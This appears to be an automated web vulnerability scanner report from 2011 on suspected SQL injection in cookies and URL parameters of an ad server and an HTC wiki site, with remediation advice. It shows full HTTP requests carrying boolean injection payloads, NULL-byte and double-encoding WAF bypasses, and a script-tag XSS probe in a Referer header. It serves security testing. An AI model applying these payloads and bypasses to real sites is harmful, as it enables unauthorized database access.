SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The autotrdr_exclude cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the autotrdr_exclude cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the autotrdr_exclude cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude%2527
Response 1
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18937
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00'; autotrdr_exclude=autotrdr_exclude;
Response 1 (redirected)
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18756
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00''; autotrdr_exclude=autotrdr_exclude;
Response 2 (redirected)
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 828
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00' HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 1
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 18756
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00'' HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;
Response 2
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 994
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:31 GMT Server: Apache Set-Cookie: wab=joinButton=38; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:31 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPo6SRuabbqp; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=FC676FF8175FB9189B56FD2C05DD08B6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:31 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 37630
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone W ...[SNIP]...
Request 2
GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:32 GMT Server: Apache Set-Cookie: wab=joinButton=82; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:32 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcGTetEI1fA+k; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:32 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 37629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>
<meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:26 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4H880Qv8zfr+; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=D81A586ADE0621AAB28668E041DF5C6E; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:26 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:28 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4BEEDqu1Zw35; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:28 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 83263946'%20or%201%3d1--%20 and 83263946'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:07 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/GnGyRMdMSYE; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=6601282A68E6A62FD4318B3E0947F341; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:07 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 63010
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/Smartphone+Blogs+and+Forums HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:07 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/A+6ceTtRjSe; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:07 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 63009
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>
<meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" /> <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people's identity and status, how to please a secular concept to treat you and your phone,..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Smartphone+How-To HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:05 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDaHC6p64G+mQ; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=9241F2DA15E0BEA02A34D8A0A7517B1B; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:05 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/Smartphone+How-To HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:06 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDY8YVP9V3BKl; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:06 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61668
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" /> <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 46190298'%20or%201%3d1--%20 and 46190298'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:34 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPRCQ+El/waa; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=0CC9698F48A8526EEA3937B4F7BB20E6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:34 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 55739
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:35 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcJoGo+pEYs0Y; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:35 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 55738
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
